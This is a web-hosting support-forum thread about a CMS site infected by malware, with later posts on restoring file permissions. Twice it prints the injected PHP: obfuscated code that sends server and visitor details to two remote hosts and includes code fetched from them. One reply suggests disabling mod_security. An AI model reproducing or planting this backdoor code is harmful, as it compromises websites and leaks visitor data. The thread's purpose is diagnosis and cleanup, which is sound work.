HTML Logo by World Wide Web Consortium (www.w3.org). Click to learn more about our commitment to accessibility and standards.

Moving forward with Composr

ocPortal has been relaunched as Composr CMS, which is now in beta. ocPortal 9 will be superseded by Composr 10.

Head over to compo.sr for our new site, and to our migration roadmap. Existing ocPortal member accounts have been mirrored.


Oh snap!

Login / Search

 [ Join | More ]
 Add topic 
Posted
Rating:
#33831 (In Topic #7635)
Avatar

Well-settled

Um.  I'm getting this error.

Code

Not Found
The requested URL /ocp/forum/index.php?page=topicview&id=9&kfs4=0 was not found on this server.

Apache Server at www.companyrpg.com Port 80


I get it for all forum posts and even for the Admin zone.  I'm going to contact my host presently to see if they have any ideas.  How about you guys?

-Geo
Back to the top
 
Posted
Rating:
#33832
Avatar

Well-settled

And why is it when I go to upgrade to the newest version I get all these files reported as alien

# adminzone/pages/comcode/EN/56188.php
# adminzone/pages/comcode/71635.php
# adminzone/pages/modules/144437.php
# adminzone/pages/102227.php
# adminzone/69741.php
# cms/pages/modules/174773.php
# cms/pages/32420.php
# cms/171785.php
# data/areaedit/plugins/ContextMenu/40379.php
# data/areaedit/plugins/SpellChecker/177033.php
# data/areaedit/plugins/CheckOnKeyPress/33271.php
# data/areaedit/plugins/82415.php
# data/areaedit/38560.php
# data/modules/admin_backup/108984.php
# data/modules/196647.php
# data/193700.php
# docs/pages/comcode/EN/132018.php
# docs/pages/comcode/97601.php
# docs/pages/125082.php
# docs/98523.php
# forum/pages/modules/141112.php
# forum/pages/73437.php
# forum/107459.php
# lang/EN/6284.php
# lang/12564.php
# pages/modules/165454.php
# pages/178077.php
# personalzone/pages/modules/80984.php
# personalzone/pages/226093.php
# personalzone/154291.php
# site/pages/comcode/EN/50060.php
# site/pages/comcode/26677.php
# site/pages/modules/147681.php
# site/pages/138979.php
# site/124492.php
# sources/blocks/116126.php
# sources/database/shared/50371.php
# sources/database/50251.php
# sources/forum/shared/179994.php
# sources/forum/102920.php
# sources/hooks/blocks/main_staff_checklist/169806.php
# sources/hooks/blocks/209163.php
# sources/hooks/modules/admin_cleanup/109861.php
# sources/hooks/modules/admin_import/shared/232189.php
# sources/hooks/modules/admin_import/86564.php
# sources/hooks/modules/admin_newsletter/63703.php
# sources/hooks/modules/admin_occle_commands/73644.php
# sources/hooks/modules/admin_occle_fs/205714.php
# sources/hooks/modules/admin_unvalidated/148110.php
# sources/hooks/modules/members/111820.php
# sources/hooks/modules/pointstore/49165.php
# sources/hooks/modules/search/68421.php
# sources/hooks/modules/11727.php
# sources/hooks/systems/ajax_tree/182513.php
# sources/hooks/systems/attachments/89466.php
# sources/hooks/systems/awards/43208.php
# sources/hooks/systems/cron/169594.php
# sources/hooks/systems/do_next_menus/14091.php
# sources/hooks/systems/ecommerce/184605.php
# sources/hooks/systems/preview/177550.php
# sources/hooks/systems/rss/94754.php
# sources/hooks/systems/trackback/142934.php
# sources/hooks/systems/module_permissions/201424.php
# sources/hooks/systems/230681.php
# sources/hooks/83806.php
# sources/109827.php
# text/EN/141691.php
# text/211233.php
# themes/default/css/130761.php
# themes/default/images/EN/comcodeeditor/173909.php
# themes/default/images/EN/97797.php
# themes/default/images/155936.php
# themes/default/templates/207312.php
# themes/default/219959.php
# themes/185225.php
# no_mem_cache.txt


Of course this is more annoying since I can't make a back up because the site isn't working.
Back to the top
 
Posted
Rating:
#33833
Avatar

Community saint

hmm did you delete any thing from the server?

I run http://otakuplayground.com and am hopping to make themes and other things for ocportal even though I no longer use it for otakuplayground.com I still love it and feel it could go far with the right help. It needs themes and needs people to advertise for it.
Back to the top
 
Posted
Rating:
#33838
Avatar

Well-settled

 No.  It just went wonky. 
Back to the top
 
Posted
Rating:
#33839
Avatar

Community saint

hmm this looks like one for Chris as I have no idea.

I run http://otakuplayground.com and am hopping to make themes and other things for ocportal even though I no longer use it for otakuplayground.com I still love it and feel it could go far with the right help. It needs themes and needs people to advertise for it.
Back to the top
 
Posted
Rating:
#33852
Avatar

That's really weird. The first thing to do would be to check whether ocp/forum/index.php is missing. The second thing would be to check what these other PHP files are. My suspicion here is that some disk corruption has occurred, or a virus has struck, and renamed/moved loads of ocPortal all over the place.


Become a fan of ocPortal on Facebook or add me as a friend. Add me on on Twitter.
Was I helpful?
  • If not, please let us know how we can do better (please try and propose any bigger ideas in such a way that they are fundable and scalable).
  • If so, please let others know about ocPortal whenever you see the opportunity.
  • If my reply is too Vulcan or expressed too much in business-strategy terms, and not particularly personal, I apologise. As a company & project maintainer, time is very limited to me, so usually when I write a reply I try and make it generic advice to all readers. I'm also naturally a joined-up thinker, so I always express my thoughts in combined business and technical terms. I recognise not everyone likes that, don't let my Vulcan-thinking stop you enjoying ocPortal on fun personal projects.
  • If my response can inspire a community tutorial, that's a great way of giving back to the project as a user.
Back to the top
 
Posted
Rating:
#33854
Avatar

Well-settled

The index is still there.  The alien files all seem to contain the same thing.

Code

<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j); if ((include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My5yc3NuZXdzLndz")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My54bWxkYXRhLmluZm8=")."/?".$str);} ?>


I only checked about 5 of them but I went all over for the sample.  I'm getting that cold feeling in the pit of my stomach…
Back to the top
 
Posted
Rating:
#33855
Avatar

Community saint

Dairyu said

Um.  I'm getting this error.

Code

Not Found
The requested URL /ocp/forum/index.php?page=topicview&id=9&kfs4=0 was not found on this server.

Apache Server at www.companyrpg.com Port 80


I get it for all forum posts and even for the Admin zone.  I'm going to contact my host presently to see if they have any ideas.  How about you guys?

-Geo

I just had this same problem today and it happened when I was posting a really large post into the catalogue. I am not sure how large it was but I asked my host and they told me to add some thing to the .htaccess and it worked.
This is what they had me add.

host said

<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>
The only difference between my error and yours was my was with the file cms/index.php

I run http://otakuplayground.com and am hopping to make themes and other things for ocportal even though I no longer use it for otakuplayground.com I still love it and feel it could go far with the right help. It needs themes and needs people to advertise for it.
Back to the top
 
Posted
Rating:
#33858
Avatar

Dairyu said

The index is still there.  The alien files all seem to contain the same thing.

Code

<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j); if ((include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My5yc3NuZXdzLndz")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My54bWxkYXRhLmluZm8=")."/?".$str);} ?>


I only checked about 5 of them but I went all over for the sample.  I'm getting that cold feeling in the pit of my stomach…

It's a virus, and the code above is 'encoded' so as to make it hard to find it. These files have been placed all over the site, and if loaded up they call home and download code from one of the following web servers:

Code

www3.rssnews.ws
www3.xmldata.info

I don't know how it will have gotten there, but often the case is that shared web hosts aren't very secure, and that if one site gets infected, others can also get infected. I'd contact the web host about this.


Become a fan of ocPortal on Facebook or add me as a friend. Add me on on Twitter.
Was I helpful?
  • If not, please let us know how we can do better (please try and propose any bigger ideas in such a way that they are fundable and scalable).
  • If so, please let others know about ocPortal whenever you see the opportunity.
  • If my reply is too Vulcan or expressed too much in business-strategy terms, and not particularly personal, I apologise. As a company & project maintainer, time is very limited to me, so usually when I write a reply I try and make it generic advice to all readers. I'm also naturally a joined-up thinker, so I always express my thoughts in combined business and technical terms. I recognise not everyone likes that, don't let my Vulcan-thinking stop you enjoying ocPortal on fun personal projects.
  • If my response can inspire a community tutorial, that's a great way of giving back to the project as a user.
Back to the top
 
Posted
Rating:
#33860
Avatar

Community saint

So its not the same thing that happened to me.

I run http://otakuplayground.com and am hopping to make themes and other things for ocportal even though I no longer use it for otakuplayground.com I still love it and feel it could go far with the right help. It needs themes and needs people to advertise for it.
Back to the top
 
Posted
Rating:
#33865
Avatar

Well-settled

OK I've contacted the web host.  If I just let the updater deal with all the foreign files will that probably fix things?
Back to the top
 
Posted
Rating:
#33866
Avatar

Community saint

I would assume so.

I run http://otakuplayground.com and am hopping to make themes and other things for ocportal even though I no longer use it for otakuplayground.com I still love it and feel it could go far with the right help. It needs themes and needs people to advertise for it.
Back to the top
 
Posted
Rating:
#33874
Avatar

Well-settled

 …and things had been going so well.

My host said that there was a permissions problem that let the virus get in. They changed the permissions and now I get

Code

This is an error that has been elevated to critical error status because it occured during the primary error mechanism reporting system itself (possibly due to it occuring within the standard output framework). It may be masking a secondary error that occured before this, but was never output - if so, it is likely strongly related to this &amp;#111;ne, thus fixing this will fix the other.

Cannot write to /home/compmat2/public_html/ocp/themes/gold/templates_cached/EN/javascript_editing.js. File permissions for it have not been set correctly.

[i]Details here are intended for the website/system-administrator, not for regular website users. If you are a regular website user, please let the website staff deal with this problem.[/i]

Depending &amp;#111;n the error, you may need to [url=&quot;http://companyrpg.com/ocp/config_editor.php&quot;]edit the base configuration[/url] (the info.php file).

ocProducts maintains full documentation for all procedures and tools. These may be found &amp;#111;n the [url=&quot;../../../../../&quot;]ocPortal website[/url]. If you are unable to easily solve this problem, we may be contacted from our website and can help resolve it for you.

  instead of the Not Found Error.

After looking for the

/home/compmat2/public_html/ocp/themes/gold/templates_cached/
EN/javascript_editing.js

to see what the permissions were I find it simply isn't there.  If this isn't a dodge by the virus where might I acquire a new one.


In addition when I try and use the force upgrade command I get this.

Code

Cannot write to /home/compmat2/public_html/ocp/themes/gold/templates_cached/EN/global.css. File permissions for it have not been set correctly.


  Any ideas? I mean it's fairly obvious that when they modified the permissions it messed something up but I'm not sure how to deal with it.

-Geo
 


Last edit: by Dairyu
Back to the top
 
Posted
Rating:
#33883
Avatar

Hi,

The ocp/themes/gold/templates_cached/EN/ folder needs write permissions, as do all the over folders in:
this tutorial
Files written into that folder are only cache files, so it doesn't matter that the file in the error message doesn't exist – the problem is that it can't be created by PHP.

On most servers, like yours, PHP needs special permissions for PHP applications to be able to write to files and directories. So ocPortal requires "world write permissions" on anything that needs to be written to.

There's no good way around that. It likely is related to the virus attack, but there are ways the webhost should guard against this (open_basedir, and jailed shells) - not allowing PHP systems to write anywhere is not a viable solution.


Become a fan of ocPortal on Facebook or add me as a friend. Add me on on Twitter.
Was I helpful?
  • If not, please let us know how we can do better (please try and propose any bigger ideas in such a way that they are fundable and scalable).
  • If so, please let others know about ocPortal whenever you see the opportunity.
  • If my reply is too Vulcan or expressed too much in business-strategy terms, and not particularly personal, I apologise. As a company & project maintainer, time is very limited to me, so usually when I write a reply I try and make it generic advice to all readers. I'm also naturally a joined-up thinker, so I always express my thoughts in combined business and technical terms. I recognise not everyone likes that, don't let my Vulcan-thinking stop you enjoying ocPortal on fun personal projects.
  • If my response can inspire a community tutorial, that's a great way of giving back to the project as a user.
Back to the top
 
Posted
Rating:
#33886
Avatar

Well-settled

What over folders?  this tutorial

Are we talking 777

Lousy virus writing ($&(@)!  Why can't they just let thing work instead of messing everything up.  Lousy freaking criminals.

Dangit.  I really like OCP I don't want to have to switch to something else.  There ISN'T anything else like OCP.
 
Back to the top
 
Posted
Rating:
#33888
Avatar

Sorry, I pointed you to the wrong tutorial. It's our installation tutorial:
ocPortal Tutorial: Basic Installation


Become a fan of ocPortal on Facebook or add me as a friend. Add me on on Twitter.
Was I helpful?
  • If not, please let us know how we can do better (please try and propose any bigger ideas in such a way that they are fundable and scalable).
  • If so, please let others know about ocPortal whenever you see the opportunity.
  • If my reply is too Vulcan or expressed too much in business-strategy terms, and not particularly personal, I apologise. As a company & project maintainer, time is very limited to me, so usually when I write a reply I try and make it generic advice to all readers. I'm also naturally a joined-up thinker, so I always express my thoughts in combined business and technical terms. I recognise not everyone likes that, don't let my Vulcan-thinking stop you enjoying ocPortal on fun personal projects.
  • If my response can inspire a community tutorial, that's a great way of giving back to the project as a user.
Back to the top
 
Posted
Rating:
#33889
Avatar

Well-settled

 This is what I got back from in Web Host. (Based on the accidental tutorial)

1. safe_mode is disabled on your server
2. open_basedir is enabled
3. PHP is complied as apache module. We have some servers where we use PHP with CGI support. We can move your account to such server.
4. Sorry, but we cannot disable SSH access for all customers on shared server. You can order VPS package. There you will be able to manage shell access yourself.
5. I disabled allow_url_fopen for your account.
6. The php memory limit is 16M.
7. I set post and upload max size to 10M.
8. We don't use Apache Su-Exec on your server.

See. They're good guys over at Mid-phase. Now if I can just get my site to work again…
 


Last edit: by Dairyu
Back to the top
 
Posted
Rating:
#33911
Avatar

Well-settled

Well my site seems to be working again.  YAY!  I think my permissions are set too high though.  I had hoped that once I could get to the upgrader I could have it check permissions and it would set everything where it should be.  It doesn't seem to do that though.  So is there any way to get the permissions set to optimal level with out going in and changing them all one at a time?
Back to the top
 
Posted
Rating:
#33957
Avatar

I've written you a simple PHP script that will tell you what files and directories you have that are writable to PHP.
Here is the code:

PHP code

<?php

header
('Content-type: text/plain');

echo 
'The following files/directories are writable...'.chr(10).chr(10);

do_dir('.');

function 
do_dir($dir)
{
   
$dh=opendir($dir);
   if (
$dh!==false)
   {
      while (
$f=readdir($dh))
      {
         if (
substr($f,0,1)!='.')
         {
            if (
is_writable($dir.'/'.$f)) echo substr($dir.'/'.$f,2).chr(10);
            if (
is_dir($dir.'/'.$f)) do_dir($dir.'/'.$f);
         }
      }
   }
   
closedir($dh);
}

?>

Just save that as find_writable.php file underneath your ocPortal directory and load it up by URL. Then delete it when you're done.
You might want to go through the results and consider whether each should or should not be writable, according to the list in our install tutorial. Any .tcd or .lcd files are cache files should be.


Become a fan of ocPortal on Facebook or add me as a friend. Add me on on Twitter.
Was I helpful?
  • If not, please let us know how we can do better (please try and propose any bigger ideas in such a way that they are fundable and scalable).
  • If so, please let others know about ocPortal whenever you see the opportunity.
  • If my reply is too Vulcan or expressed too much in business-strategy terms, and not particularly personal, I apologise. As a company & project maintainer, time is very limited to me, so usually when I write a reply I try and make it generic advice to all readers. I'm also naturally a joined-up thinker, so I always express my thoughts in combined business and technical terms. I recognise not everyone likes that, don't let my Vulcan-thinking stop you enjoying ocPortal on fun personal projects.
  • If my response can inspire a community tutorial, that's a great way of giving back to the project as a user.
Back to the top
 
Posted
Rating:
#33961
Avatar

Community saint

Thats neat and would make a good tool. *adding it to mine*

I run http://otakuplayground.com and am hopping to make themes and other things for ocportal even though I no longer use it for otakuplayground.com I still love it and feel it could go far with the right help. It needs themes and needs people to advertise for it.
Back to the top
 
There are too many online users to list.
Control functions:

Quick reply   Contract

Your name:
Your message: